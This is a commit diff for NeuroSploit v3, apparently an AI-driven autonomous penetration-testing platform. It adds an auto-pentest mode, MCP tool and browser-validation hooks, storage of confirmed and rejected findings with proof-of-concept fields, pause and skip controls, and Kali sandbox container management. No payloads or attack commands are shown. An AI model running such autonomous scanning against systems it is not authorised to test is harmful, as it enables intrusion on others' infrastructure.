Add files via upload

This commit is contained in:
Joas A Santos
2026-02-11 10:47:33 -03:00
committed by GitHub
parent e32573a950
commit 30acd5afc7
52 changed files with 22492 additions and 706 deletions
+91
View File
@@ -47,6 +47,35 @@ class BaseAgent:
self.interesting_findings = []
self.tool_history = []
# Knowledge augmentation (opt-in via env)
self.augmentor = None
if os.getenv('ENABLE_KNOWLEDGE_AUGMENTATION', 'false').lower() == 'true':
try:
from core.knowledge_augmentor import KnowledgeAugmentor
ka_config = config.get('knowledge_augmentation', {})
self.augmentor = KnowledgeAugmentor(
dataset_path=ka_config.get('dataset_path', 'models/bug-bounty/bugbounty_finetuning_dataset.json'),
max_patterns=ka_config.get('max_patterns_per_query', 3)
)
logger.info("Knowledge augmentation enabled")
except Exception as e:
logger.warning(f"Knowledge augmentation init failed: {e}")
# MCP tool client (opt-in via config)
self.mcp_client = None
if config.get('mcp_servers', {}).get('enabled', False):
try:
from core.mcp_client import MCPToolClient
self.mcp_client = MCPToolClient(config)
logger.info("MCP tool client enabled")
except Exception as e:
logger.warning(f"MCP client init failed: {e}")
# Browser validation (opt-in via env)
self.browser_validation_enabled = (
os.getenv('ENABLE_BROWSER_VALIDATION', 'false').lower() == 'true'
)
logger.info(f"Initialized {self.agent_name} - Autonomous Agent")
def _extract_targets(self, user_input: str) -> List[str]:
@@ -131,6 +160,68 @@ class BaseAgent:
self.tool_history.append(result)
return result
def run_mcp_tool(self, tool_name: str, arguments: Optional[Dict] = None) -> Optional[str]:
"""Execute a tool via MCP if available, returns None for subprocess fallback."""
if not self.mcp_client or not self.mcp_client.enabled:
return None
import asyncio
try:
result = asyncio.run(self.mcp_client.try_tool(tool_name, arguments))
if result is not None:
logger.info(f"MCP tool executed: {tool_name}")
return result
except Exception as e:
logger.debug(f"MCP tool '{tool_name}' not available: {e}")
return None
def run_browser_validation(self, finding_id: str, url: str,
payload: str = None) -> Dict:
"""Validate a finding using Playwright browser.
Only executes if ENABLE_BROWSER_VALIDATION is set.
Returns validation result with screenshots.
"""
if not self.browser_validation_enabled:
return {"skipped": True, "reason": "Browser validation disabled"}
try:
from core.browser_validator import validate_finding_sync
screenshots_dir = self.config.get('browser_validation', {}).get(
'screenshots_dir', 'reports/screenshots'
)
return validate_finding_sync(
finding_id=finding_id,
url=url,
payload=payload,
screenshots_dir=f"{screenshots_dir}/{self.agent_name}",
headless=self.config.get('browser_validation', {}).get('headless', True)
)
except Exception as e:
logger.error(f"Browser validation failed for {finding_id}: {e}")
return {"finding_id": finding_id, "error": str(e)}
def get_augmented_context(self, vulnerability_types: List[str]) -> str:
"""Get knowledge augmentation context for detected vulnerability types.
Returns formatted pattern context string to inject into prompts.
"""
if not self.augmentor:
return ""
augmentation = ""
technologies = list(self.tech_stack.get('detected', []))
for vtype in vulnerability_types[:3]: # Limit to avoid context bloat
patterns = self.augmentor.get_relevant_patterns(
vulnerability_type=vtype,
technologies=technologies
)
if patterns:
augmentation += patterns
return augmentation
def execute(self, user_input: str, campaign_data: Dict = None, recon_context: Dict = None) -> Dict:
"""
Execute security assessment.
+327 -36
View File
@@ -32,6 +32,8 @@ agent_instances: Dict[str, AutonomousAgent] = {}
# Map agent_id to scan_id for database persistence
agent_to_scan: Dict[str, str] = {}
# Reverse map: scan_id to agent_id for ScanDetailsPage lookups
scan_to_agent: Dict[str, str] = {}
@router.get("/status")
@@ -101,6 +103,7 @@ class AgentMode(str, Enum):
RECON_ONLY = "recon_only" # Just reconnaissance
PROMPT_ONLY = "prompt_only" # AI decides (high tokens)
ANALYZE_ONLY = "analyze_only" # Analysis without testing
AUTO_PENTEST = "auto_pentest" # One-click full auto pentest
class AgentRequest(BaseModel):
@@ -113,6 +116,8 @@ class AgentRequest(BaseModel):
auth_value: Optional[str] = Field(None, description="Auth value (cookie string, token, etc)")
custom_headers: Optional[Dict[str, str]] = Field(None, description="Custom HTTP headers")
max_depth: int = Field(5, description="Maximum crawl depth")
subdomain_discovery: bool = Field(False, description="Enable subdomain discovery (auto_pentest mode)")
targets: Optional[List[str]] = Field(None, description="Multiple targets (auto_pentest mode)")
class AgentResponse(BaseModel):
@@ -193,7 +198,9 @@ async def run_agent(request: AgentRequest, background_tasks: BackgroundTasks):
"findings": [],
"report": None,
"progress": 0,
"phase": "initializing"
"phase": "initializing",
"rejected_findings": [],
"rejected_findings_count": 0,
}
# Run agent in background
@@ -212,7 +219,8 @@ async def run_agent(request: AgentRequest, background_tasks: BackgroundTasks):
"full_auto": "Full autonomous pentest: Recon -> Analyze -> Test -> Report",
"recon_only": "Reconnaissance only, no vulnerability testing",
"prompt_only": "AI decides everything (high token usage!)",
"analyze_only": "Analysis only, no active testing"
"analyze_only": "Analysis only, no active testing",
"auto_pentest": "One-click auto pentest: Full recon + 100 vuln types + AI report"
}
return AgentResponse(
@@ -255,12 +263,20 @@ async def _run_agent_task(
agent_results[agent_id]["progress"] = progress
agent_results[agent_id]["phase"] = phase
rejected_findings_list = []
async def finding_callback(finding: Dict):
"""Real-time finding callback - updates in-memory storage immediately"""
findings_list.append(finding)
if agent_id in agent_results:
agent_results[agent_id]["findings"] = findings_list
agent_results[agent_id]["findings_count"] = len(findings_list)
if finding.get("ai_status") == "rejected":
rejected_findings_list.append(finding)
if agent_id in agent_results:
agent_results[agent_id]["rejected_findings"] = rejected_findings_list
agent_results[agent_id]["rejected_findings_count"] = len(rejected_findings_list)
else:
findings_list.append(finding)
if agent_id in agent_results:
agent_results[agent_id]["findings"] = findings_list
agent_results[agent_id]["findings_count"] = len(findings_list)
try:
# Create database session and scan record
@@ -289,8 +305,9 @@ async def _run_agent_task(
db.add(target_record)
await db.commit()
# Store mapping
# Store mapping (both directions)
agent_to_scan[agent_id] = scan_id
scan_to_agent[scan_id] = agent_id
agent_results[agent_id]["scan_id"] = scan_id
# Map mode
@@ -299,6 +316,7 @@ async def _run_agent_task(
AgentMode.RECON_ONLY: OperationMode.RECON_ONLY,
AgentMode.PROMPT_ONLY: OperationMode.PROMPT_ONLY,
AgentMode.ANALYZE_ONLY: OperationMode.ANALYZE_ONLY,
AgentMode.AUTO_PENTEST: OperationMode.AUTO_PENTEST,
}
op_mode = mode_map.get(mode, OperationMode.FULL_AUTO)
@@ -311,6 +329,7 @@ async def _run_agent_task(
task=task,
custom_prompt=custom_prompt or (task.prompt if task else None),
finding_callback=finding_callback,
scan_id=str(scan_id),
) as agent:
# Store agent instance for stop functionality
agent_instances[agent_id] = agent
@@ -345,7 +364,41 @@ async def _run_agent_task(
impact=finding.get("impact", ""),
remediation=finding.get("remediation", ""),
references=finding.get("references", []),
ai_analysis=finding.get("ai_analysis", finding.get("exploitation_steps", ""))
ai_analysis=finding.get("ai_analysis", finding.get("exploitation_steps", "")),
poc_code=finding.get("poc_code", ""),
screenshots=finding.get("screenshots", []),
url=finding.get("url", finding.get("affected_endpoint", "")),
parameter=finding.get("parameter", finding.get("poc_parameter", "")),
validation_status="ai_confirmed",
)
db.add(vuln)
# Save rejected findings to database for manual review
for finding in report.get("rejected_findings", []):
vuln = Vulnerability(
scan_id=scan_id,
title=finding.get("title", finding.get("type", "Unknown")),
vulnerability_type=finding.get("vulnerability_type", finding.get("type", "unknown")),
severity=finding.get("severity", "medium").lower(),
cvss_score=finding.get("cvss_score"),
cvss_vector=finding.get("cvss_vector"),
cwe_id=finding.get("cwe_id"),
description=finding.get("description", finding.get("evidence", "")),
affected_endpoint=finding.get("affected_endpoint", finding.get("endpoint", finding.get("url", target))),
poc_payload=finding.get("payload", finding.get("poc_payload", "")),
poc_parameter=finding.get("parameter", finding.get("poc_parameter", "")),
poc_evidence=finding.get("evidence", finding.get("poc_evidence", "")),
poc_request=str(finding.get("request", finding.get("poc_request", "")))[:5000],
poc_response=str(finding.get("response", finding.get("poc_response", "")))[:5000],
impact=finding.get("impact", ""),
remediation=finding.get("remediation", ""),
references=finding.get("references", []),
poc_code=finding.get("poc_code", ""),
screenshots=finding.get("screenshots", []),
url=finding.get("url", finding.get("affected_endpoint", "")),
parameter=finding.get("parameter", finding.get("poc_parameter", "")),
validation_status="ai_rejected",
ai_rejection_reason=finding.get("rejection_reason", ""),
)
db.add(vuln)
@@ -402,6 +455,7 @@ async def _run_agent_task(
agent_results[agent_id]["report"] = report
agent_results[agent_id]["report_id"] = report_record.id
agent_results[agent_id]["findings"] = findings
agent_results[agent_id]["tool_executions"] = report.get("tool_executions", [])
agent_results[agent_id]["progress"] = 100
agent_results[agent_id]["phase"] = "completed"
@@ -429,6 +483,37 @@ async def _run_agent_task(
pass
@router.get("/by-scan/{scan_id}")
async def get_agent_by_scan(scan_id: str):
"""Look up agent status by scan_id (reverse lookup for ScanDetailsPage)"""
agent_id = scan_to_agent.get(scan_id)
if not agent_id:
raise HTTPException(status_code=404, detail="No agent found for this scan")
if agent_id in agent_results:
result = agent_results[agent_id]
return {
"agent_id": agent_id,
"scan_id": scan_id,
"status": result["status"],
"mode": result.get("mode", "full_auto"),
"target": result["target"],
"progress": result.get("progress", 0),
"phase": result.get("phase", "unknown"),
"started_at": result.get("started_at"),
"completed_at": result.get("completed_at"),
"findings_count": len(result.get("findings", [])),
"findings": result.get("findings", []),
"rejected_findings_count": len(result.get("rejected_findings", [])),
"rejected_findings": result.get("rejected_findings", []),
"logs_count": len(result.get("logs", [])),
"report": result.get("report"),
"error": result.get("error")
}
raise HTTPException(status_code=404, detail="Agent data no longer in memory")
@router.get("/status/{agent_id}")
async def get_agent_status(agent_id: str):
"""Get the status and results of an agent run - with database fallback"""
@@ -449,6 +534,8 @@ async def get_agent_status(agent_id: str):
"logs_count": len(result.get("logs", [])),
"findings_count": len(result.get("findings", [])),
"findings": result.get("findings", []),
"rejected_findings_count": len(result.get("rejected_findings", [])),
"rejected_findings": result.get("rejected_findings", []),
"report": result.get("report"),
"error": result.get("error")
}
@@ -495,10 +582,12 @@ async def _get_status_from_db(agent_id: str, scan_id: str):
"evidence": getattr(v, 'poc_evidence', None) or "",
"request": v.poc_request or "",
"response": v.poc_response or "",
"poc_code": v.poc_payload or "",
"poc_code": getattr(v, 'poc_code', None) or v.poc_payload or "",
"impact": v.impact or "",
"remediation": v.remediation or "",
"references": v.references or [],
"screenshots": getattr(v, 'screenshots', None) or [],
"url": getattr(v, 'url', None) or v.affected_endpoint or "",
"ai_verified": True,
"confidence": "high"
}
@@ -542,14 +631,14 @@ async def _get_status_from_db(agent_id: str, scan_id: str):
@router.post("/stop/{agent_id}")
async def stop_agent(agent_id: str):
"""Stop a running agent scan and auto-generate report"""
"""Stop a running agent scan, save all findings to DB, and generate report."""
if agent_id not in agent_results:
raise HTTPException(status_code=404, detail="Agent not found")
if agent_results[agent_id]["status"] != "running":
return {"message": "Agent is not running", "status": agent_results[agent_id]["status"]}
# Cancel the agent
# Cancel the agent immediately
if agent_id in agent_instances:
agent_instances[agent_id].cancel()
@@ -558,9 +647,10 @@ async def stop_agent(agent_id: str):
agent_results[agent_id]["phase"] = "stopped"
agent_results[agent_id]["completed_at"] = datetime.utcnow().isoformat()
# Update database and auto-generate report
# Update database: save findings + generate report
scan_id = agent_to_scan.get(agent_id)
report_id = None
target = agent_results[agent_id].get("target", "Unknown")
if scan_id:
try:
@@ -573,47 +663,222 @@ async def stop_agent(agent_id: str):
scan.status = "stopped"
scan.completed_at = datetime.utcnow()
# Get findings count
# Save confirmed findings to DB (same as completion flow)
findings = agent_results[agent_id].get("findings", [])
scan.total_vulnerabilities = len(findings)
severity_counts = {"critical": 0, "high": 0, "medium": 0, "low": 0, "info": 0}
# Count severities
for finding in findings:
severity = finding.get("severity", "").lower()
if severity == "critical":
scan.critical_count = (scan.critical_count or 0) + 1
elif severity == "high":
scan.high_count = (scan.high_count or 0) + 1
elif severity == "medium":
scan.medium_count = (scan.medium_count or 0) + 1
elif severity == "low":
scan.low_count = (scan.low_count or 0) + 1
elif severity == "info":
scan.info_count = (scan.info_count or 0) + 1
severity = finding.get("severity", "medium").lower()
if severity in severity_counts:
severity_counts[severity] += 1
vuln = Vulnerability(
scan_id=scan_id,
title=finding.get("title", finding.get("type", "Unknown")),
vulnerability_type=finding.get("vulnerability_type", finding.get("type", "unknown")),
severity=severity,
cvss_score=finding.get("cvss_score"),
cvss_vector=finding.get("cvss_vector"),
cwe_id=finding.get("cwe_id"),
description=finding.get("description", finding.get("evidence", "")),
affected_endpoint=finding.get("affected_endpoint", finding.get("endpoint", finding.get("url", target))),
poc_payload=finding.get("payload", finding.get("poc_payload", "")),
poc_parameter=finding.get("parameter", finding.get("poc_parameter", "")),
poc_evidence=finding.get("evidence", finding.get("poc_evidence", "")),
poc_request=str(finding.get("request", finding.get("poc_request", "")))[:5000],
poc_response=str(finding.get("response", finding.get("poc_response", "")))[:5000],
impact=finding.get("impact", ""),
remediation=finding.get("remediation", ""),
references=finding.get("references", []),
ai_analysis=finding.get("ai_analysis", finding.get("exploitation_steps", "")),
poc_code=finding.get("poc_code", ""),
screenshots=finding.get("screenshots", []),
url=finding.get("url", finding.get("affected_endpoint", "")),
parameter=finding.get("parameter", finding.get("poc_parameter", "")),
validation_status="ai_confirmed",
)
db.add(vuln)
# Save rejected findings to DB for manual review
rejected = agent_results[agent_id].get("rejected_findings", [])
for finding in rejected:
vuln = Vulnerability(
scan_id=scan_id,
title=finding.get("title", finding.get("type", "Unknown")),
vulnerability_type=finding.get("vulnerability_type", finding.get("type", "unknown")),
severity=finding.get("severity", "medium").lower(),
cvss_score=finding.get("cvss_score"),
cvss_vector=finding.get("cvss_vector"),
cwe_id=finding.get("cwe_id"),
description=finding.get("description", finding.get("evidence", "")),
affected_endpoint=finding.get("affected_endpoint", finding.get("endpoint", finding.get("url", target))),
poc_payload=finding.get("payload", finding.get("poc_payload", "")),
poc_parameter=finding.get("parameter", finding.get("poc_parameter", "")),
poc_evidence=finding.get("evidence", finding.get("poc_evidence", "")),
poc_request=str(finding.get("request", finding.get("poc_request", "")))[:5000],
poc_response=str(finding.get("response", finding.get("poc_response", "")))[:5000],
impact=finding.get("impact", ""),
remediation=finding.get("remediation", ""),
references=finding.get("references", []),
poc_code=finding.get("poc_code", ""),
screenshots=finding.get("screenshots", []),
url=finding.get("url", finding.get("affected_endpoint", "")),
parameter=finding.get("parameter", finding.get("poc_parameter", "")),
validation_status="ai_rejected",
ai_rejection_reason=finding.get("rejection_reason", ""),
)
db.add(vuln)
# Update scan counts (confirmed only)
scan.total_vulnerabilities = len(findings)
scan.critical_count = severity_counts["critical"]
scan.high_count = severity_counts["high"]
scan.medium_count = severity_counts["medium"]
scan.low_count = severity_counts["low"]
scan.info_count = severity_counts["info"]
await db.commit()
# Auto-generate report
report = Report(
# Auto-generate report record
report_record = Report(
scan_id=scan_id,
title=f"Agent Scan Report - {agent_results[agent_id].get('target', 'Unknown')}",
title=f"Agent Scan Report - {target}",
format="json",
executive_summary=f"Automated security scan completed with {len(findings)} findings."
executive_summary=f"Security scan stopped with {len(findings)} confirmed and {len(rejected)} rejected findings."
)
db.add(report)
db.add(report_record)
await db.commit()
await db.refresh(report)
report_id = report.id
await db.refresh(report_record)
report_id = report_record.id
except Exception as e:
print(f"Error updating scan status: {e}")
print(f"Error updating scan status on stop: {e}")
import traceback
traceback.print_exc()
return {
"message": "Agent stopped successfully",
"agent_id": agent_id,
"report_id": report_id
"report_id": report_id,
"findings_saved": len(agent_results[agent_id].get("findings", [])),
"rejected_saved": len(agent_results[agent_id].get("rejected_findings", [])),
}
@router.post("/pause/{agent_id}")
async def pause_agent(agent_id: str):
"""Pause a running agent scan"""
if agent_id not in agent_results:
raise HTTPException(status_code=404, detail="Agent not found")
if agent_results[agent_id]["status"] != "running":
return {"message": "Agent is not running", "status": agent_results[agent_id]["status"]}
if agent_id in agent_instances:
agent_instances[agent_id].pause()
# Save current phase before overwriting with "paused"
agent_results[agent_id]["last_phase"] = agent_results[agent_id].get("phase", "recon")
agent_results[agent_id]["status"] = "paused"
agent_results[agent_id]["phase"] = "paused"
return {"message": "Agent paused", "agent_id": agent_id}
@router.post("/resume/{agent_id}")
async def resume_agent(agent_id: str):
"""Resume a paused agent scan"""
if agent_id not in agent_results:
raise HTTPException(status_code=404, detail="Agent not found")
if agent_results[agent_id]["status"] != "paused":
return {"message": "Agent is not paused", "status": agent_results[agent_id]["status"]}
if agent_id in agent_instances:
agent_instances[agent_id].resume()
agent_results[agent_id]["status"] = "running"
# Restore the phase that was active before pause
agent_results[agent_id]["phase"] = agent_results[agent_id].get("last_phase", "testing")
return {"message": "Agent resumed", "agent_id": agent_id}
# Agent phase order for skip validation
AGENT_PHASE_ORDER = ["recon", "analysis", "testing", "enhancement", "completed"]
# Map phase names from status strings to canonical phase keys
PHASE_NORMALIZE = {
"starting reconnaissance": "recon",
"reconnaissance complete": "recon",
"initial probe complete": "recon",
"endpoint discovery complete": "recon",
"parameter discovery complete": "recon",
"attack surface analyzed": "analysis",
"vulnerability testing complete": "testing",
"findings enhanced": "enhancement",
"assessment complete": "completed",
}
@router.post("/skip-to/{agent_id}/{target_phase}")
async def skip_agent_phase(agent_id: str, target_phase: str):
"""Skip the current agent phase and jump to a target phase.
Valid phases: recon, analysis, testing, enhancement, completed
Can only skip forward (to a phase ahead of current).
"""
if agent_id not in agent_results:
raise HTTPException(status_code=404, detail="Agent not found")
agent_status = agent_results[agent_id]["status"]
if agent_status not in ("running", "paused"):
raise HTTPException(status_code=400, detail="Agent is not running or paused")
if target_phase not in AGENT_PHASE_ORDER:
raise HTTPException(
status_code=400,
detail=f"Invalid phase '{target_phase}'. Valid: {', '.join(AGENT_PHASE_ORDER[1:])}"
)
# Get current phase and normalize it
current_raw = agent_results[agent_id].get("phase", "").lower()
# Handle "paused" phase — use the last known non-paused phase, default to recon
if current_raw in ("paused", "stopped"):
current_raw = agent_results[agent_id].get("last_phase", "recon")
current_phase = PHASE_NORMALIZE.get(current_raw, current_raw)
# Also try prefix match
for key in AGENT_PHASE_ORDER:
if key in current_phase:
current_phase = key
break
cur_idx = AGENT_PHASE_ORDER.index(current_phase) if current_phase in AGENT_PHASE_ORDER else 0
tgt_idx = AGENT_PHASE_ORDER.index(target_phase)
if tgt_idx <= cur_idx:
raise HTTPException(
status_code=400,
detail=f"Cannot skip backward. Current: {current_phase}, target: {target_phase}"
)
# Signal the agent instance to skip
if agent_id in agent_instances:
# If paused, resume first so the skip can be processed
if agent_status == "paused":
agent_instances[agent_id].resume()
agent_results[agent_id]["status"] = "running"
success = agent_instances[agent_id].skip_to_phase(target_phase)
if not success:
raise HTTPException(status_code=500, detail="Failed to signal phase skip")
else:
raise HTTPException(status_code=400, detail="Agent instance not available for signaling")
return {
"message": f"Skipping to phase: {target_phase}",
"agent_id": agent_id,
"from_phase": current_phase,
"target_phase": target_phase
}
@@ -1711,7 +1976,10 @@ async def _save_realtime_findings_to_db(session_id: str, session: Dict):
impact=finding.get("impact", ""),
remediation=finding.get("remediation", ""),
references=finding.get("references", []),
ai_analysis=f"Identified during realtime session {session_id}"
ai_analysis=f"Identified during realtime session {session_id}",
screenshots=finding.get("screenshots", []),
url=finding.get("url", finding.get("affected_endpoint", "")),
parameter=finding.get("parameter", "")
)
db.add(vuln)
@@ -1809,6 +2077,29 @@ async def generate_realtime_report(session_id: str, format: str = "json"):
scan_results=tool_results
)
# Save to a per-report folder with screenshots
import shutil
from pathlib import Path
timestamp = datetime.utcnow().strftime("%Y%m%d_%H%M%S")
target_name = session["target"].replace("://", "_").replace("/", "_").rstrip("_")[:40]
report_dir = Path("reports") / f"report_{target_name}_{timestamp}"
report_dir.mkdir(parents=True, exist_ok=True)
(report_dir / f"report_{timestamp}.html").write_text(html_content)
# Copy screenshots into report folder
screenshots_src = Path("reports") / "screenshots"
if screenshots_src.exists():
screenshots_dest = report_dir / "screenshots"
for finding in findings:
fid = finding.get("id", "")
if fid:
src_dir = screenshots_src / str(fid)
if src_dir.exists():
dest_dir = screenshots_dest / str(fid)
dest_dir.mkdir(parents=True, exist_ok=True)
for ss_file in src_dir.glob("*.png"):
shutil.copy2(ss_file, dest_dir / ss_file.name)
return HTMLResponse(content=html_content, media_type="text/html")
return {
+166 -1
View File
@@ -64,6 +64,19 @@ async def generate_report(
)
vulnerabilities = vulns_result.scalars().all()
# Try to get tool_executions from agent in-memory results
tool_executions = []
try:
from backend.api.v1.agent import scan_to_agent, agent_results
agent_id = scan_to_agent.get(report_data.scan_id)
if agent_id and agent_id in agent_results:
tool_executions = agent_results[agent_id].get("tool_executions", [])
if not tool_executions:
rpt = agent_results[agent_id].get("report", {})
tool_executions = rpt.get("tool_executions", []) if isinstance(rpt, dict) else []
except Exception:
pass
# Generate report
generator = ReportGenerator()
report_path, executive_summary = await generator.generate(
@@ -73,7 +86,8 @@ async def generate_report(
title=report_data.title,
include_executive_summary=report_data.include_executive_summary,
include_poc=report_data.include_poc,
include_remediation=report_data.include_remediation
include_remediation=report_data.include_remediation,
tool_executions=tool_executions,
)
# Save report record
@@ -91,6 +105,63 @@ async def generate_report(
return ReportResponse(**report.to_dict())
@router.post("/ai-generate", response_model=ReportResponse)
async def generate_ai_report(
report_data: ReportGenerate,
db: AsyncSession = Depends(get_db)
):
"""Generate an AI-enhanced report with LLM-written executive summary and per-finding analysis."""
# Get scan
scan_result = await db.execute(select(Scan).where(Scan.id == report_data.scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
# Get vulnerabilities
vulns_result = await db.execute(
select(Vulnerability).where(Vulnerability.scan_id == report_data.scan_id)
)
vulnerabilities = vulns_result.scalars().all()
# Try to get tool_executions from agent in-memory results
tool_executions = []
try:
from backend.api.v1.agent import scan_to_agent, agent_results
agent_id = scan_to_agent.get(report_data.scan_id)
if agent_id and agent_id in agent_results:
tool_executions = agent_results[agent_id].get("tool_executions", [])
# Also check nested report
if not tool_executions:
rpt = agent_results[agent_id].get("report", {})
tool_executions = rpt.get("tool_executions", []) if isinstance(rpt, dict) else []
except Exception:
pass
# Generate AI report
generator = ReportGenerator()
report_path, ai_summary = await generator.generate_ai_report(
scan=scan,
vulnerabilities=vulnerabilities,
tool_executions=tool_executions,
title=report_data.title,
)
# Save report record
report = Report(
scan_id=scan.id,
title=report_data.title or f"AI Report - {scan.name}",
format="html",
file_path=str(report_path),
executive_summary=ai_summary[:2000] if ai_summary else None
)
db.add(report)
await db.commit()
await db.refresh(report)
return ReportResponse(**report.to_dict())
@router.get("/{report_id}", response_model=ReportResponse)
async def get_report(report_id: str, db: AsyncSession = Depends(get_db)):
"""Get report details"""
@@ -187,6 +258,100 @@ async def download_report(
)
@router.get("/{report_id}/download-zip")
async def download_report_zip(
report_id: str,
db: AsyncSession = Depends(get_db)
):
"""Download report as ZIP with screenshots included"""
import zipfile
import tempfile
import hashlib
result = await db.execute(select(Report).where(Report.id == report_id))
report = result.scalar_one_or_none()
if not report:
raise HTTPException(status_code=404, detail="Report not found")
scan_result = await db.execute(select(Scan).where(Scan.id == report.scan_id))
scan = scan_result.scalar_one_or_none()
if not scan:
raise HTTPException(status_code=404, detail="Scan not found for report")
vulns_result = await db.execute(
select(Vulnerability).where(Vulnerability.scan_id == report.scan_id)
)
vulnerabilities = vulns_result.scalars().all()
# Generate HTML report
generator = ReportGenerator()
report_path, _ = await generator.generate(
scan=scan,
vulnerabilities=vulnerabilities,
format="html",
title=report.title
)
# Collect screenshots (use absolute path via settings.BASE_DIR)
# Check scan-scoped path first, then legacy flat path
screenshots_base = settings.BASE_DIR / "reports" / "screenshots"
scan_id_str = str(scan.id) if scan else None
screenshot_files = []
for vuln in vulnerabilities:
# Finding ID is md5(vuln_type+url+param)[:8]
vuln_url = getattr(vuln, 'url', None) or vuln.affected_endpoint or ''
vuln_param = getattr(vuln, 'parameter', None) or getattr(vuln, 'poc_parameter', None) or ''
finding_id = hashlib.md5(
f"{vuln.vulnerability_type}{vuln_url}{vuln_param}".encode()
).hexdigest()[:8]
# Scan-scoped path: reports/screenshots/{scan_id}/{finding_id}/
finding_dir = None
if scan_id_str:
scan_dir = screenshots_base / scan_id_str / finding_id
if scan_dir.exists():
finding_dir = scan_dir
if not finding_dir:
legacy_dir = screenshots_base / finding_id
if legacy_dir.exists():
finding_dir = legacy_dir
if finding_dir:
for img in finding_dir.glob("*.png"):
screenshot_files.append((img, f"screenshots/{finding_id}/{img.name}"))
# Also include base64 screenshots from DB as files in the ZIP
db_screenshots = getattr(vuln, 'screenshots', None) or []
for idx, ss in enumerate(db_screenshots):
if isinstance(ss, str) and ss.startswith("data:image/"):
# Will be embedded in HTML, but also save as file
import base64 as b64
try:
b64_data = ss.split(",", 1)[1]
img_bytes = b64.b64decode(b64_data)
img_name = f"screenshots/{finding_id}/evidence_{idx+1}.png"
# Write to temp for ZIP inclusion
tmp_img = Path(tempfile.gettempdir()) / f"ss_{finding_id}_{idx}.png"
tmp_img.write_bytes(img_bytes)
screenshot_files.append((tmp_img, img_name))
except Exception:
pass
# Create ZIP
zip_name = Path(report_path).stem + ".zip"
zip_path = Path(tempfile.gettempdir()) / zip_name
with zipfile.ZipFile(str(zip_path), 'w', zipfile.ZIP_DEFLATED) as zf:
zf.write(report_path, "report.html")
for src_path, arc_name in screenshot_files:
zf.write(str(src_path), arc_name)
return FileResponse(
path=str(zip_path),
media_type="application/zip",
filename=zip_name
)
@router.delete("/{report_id}")
async def delete_report(report_id: str, db: AsyncSession = Depends(get_db)):
"""Delete a report"""
+130
View File
@@ -0,0 +1,130 @@
"""
NeuroSploit v3 - Sandbox Container Management API
Real-time monitoring and management of per-scan Kali Linux containers.
"""
from datetime import datetime
from fastapi import APIRouter, HTTPException
router = APIRouter()
def _docker_available() -> bool:
try:
import docker
docker.from_env().ping()
return True
except Exception:
return False
@router.get("/")
async def list_sandboxes():
"""List all sandbox containers with pool status."""
try:
from core.container_pool import get_pool
pool = get_pool()
except Exception as e:
return {
"pool": {
"active": 0,
"max_concurrent": 0,
"image": "neurosploit-kali:latest",
"container_ttl_minutes": 60,
"docker_available": _docker_available(),
},
"containers": [],
"error": str(e),
}
sandboxes = pool.list_sandboxes()
now = datetime.utcnow()
containers = []
for info in sandboxes.values():
created = info.get("created_at")
uptime = 0.0
if created:
try:
dt = datetime.fromisoformat(created)
uptime = (now - dt).total_seconds()
except Exception:
pass
containers.append({
**info,
"uptime_seconds": uptime,
})
return {
"pool": {
"active": pool.active_count,
"max_concurrent": pool.max_concurrent,
"image": pool.image,
"container_ttl_minutes": int(pool.container_ttl.total_seconds() / 60),
"docker_available": _docker_available(),
},
"containers": containers,
}
@router.get("/{scan_id}")
async def get_sandbox(scan_id: str):
"""Get health check for a specific sandbox container."""
try:
from core.container_pool import get_pool
pool = get_pool()
except Exception as e:
raise HTTPException(status_code=503, detail=str(e))
sandboxes = pool.list_sandboxes()
if scan_id not in sandboxes:
raise HTTPException(status_code=404, detail=f"No sandbox for scan {scan_id}")
sb = pool._sandboxes.get(scan_id)
if not sb:
raise HTTPException(status_code=404, detail=f"Sandbox instance not found")
health = await sb.health_check()
return health
@router.delete("/{scan_id}")
async def destroy_sandbox(scan_id: str):
"""Destroy a specific sandbox container."""
try:
from core.container_pool import get_pool
pool = get_pool()
except Exception as e:
raise HTTPException(status_code=503, detail=str(e))
sandboxes = pool.list_sandboxes()
if scan_id not in sandboxes:
raise HTTPException(status_code=404, detail=f"No sandbox for scan {scan_id}")
await pool.destroy(scan_id)
return {"message": f"Sandbox for scan {scan_id} destroyed", "scan_id": scan_id}
@router.post("/cleanup")
async def cleanup_expired():
"""Remove containers that have exceeded their TTL."""
try:
from core.container_pool import get_pool
pool = get_pool()
await pool.cleanup_expired()
return {"message": "Expired containers cleaned up"}
except Exception as e:
raise HTTPException(status_code=503, detail=str(e))
@router.post("/cleanup-orphans")
async def cleanup_orphans():
"""Remove orphan containers not tracked by the pool."""
try:
from core.container_pool import get_pool
pool = get_pool()
await pool.cleanup_orphans()
return {"message": "Orphan containers cleaned up"}
except Exception as e:
raise HTTPException(status_code=503, detail=str(e))
+204 -3
View File
@@ -4,6 +4,7 @@ NeuroSploit v3 - Scans API Endpoints
from typing import List, Optional
from datetime import datetime
from fastapi import APIRouter, Depends, HTTPException, BackgroundTasks
from pydantic import BaseModel
from sqlalchemy.ext.asyncio import AsyncSession
from sqlalchemy import select, func
from urllib.parse import urlparse
@@ -11,7 +12,7 @@ from urllib.parse import urlparse
from backend.db.database import get_db
from backend.models import Scan, Target, Endpoint, Vulnerability
from backend.schemas.scan import ScanCreate, ScanUpdate, ScanResponse, ScanListResponse, ScanProgress
from backend.services.scan_service import run_scan_task
from backend.services.scan_service import run_scan_task, skip_to_phase as _skip_to_phase, PHASE_ORDER
router = APIRouter()
@@ -177,6 +178,7 @@ async def start_scan(
async def stop_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
"""Stop a running scan and save partial results"""
from backend.api.websocket import manager as ws_manager
from backend.api.v1.agent import scan_to_agent, agent_instances, agent_results
result = await db.execute(select(Scan).where(Scan.id == scan_id))
scan = result.scalar_one_or_none()
@@ -184,8 +186,16 @@ async def stop_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
if not scan:
raise HTTPException(status_code=404, detail="Scan not found")
if scan.status != "running":
raise HTTPException(status_code=400, detail="Scan is not running")
if scan.status not in ("running", "paused"):
raise HTTPException(status_code=400, detail="Scan is not running or paused")
# Signal the running agent to stop
agent_id = scan_to_agent.get(scan_id)
if agent_id and agent_id in agent_instances:
agent_instances[agent_id].cancel()
if agent_id in agent_results:
agent_results[agent_id]["status"] = "stopped"
agent_results[agent_id]["phase"] = "stopped"
# Update scan status
scan.status = "stopped"
@@ -259,6 +269,132 @@ async def stop_scan(scan_id: str, db: AsyncSession = Depends(get_db)):
}
@router.post("/{scan_id}/pause")
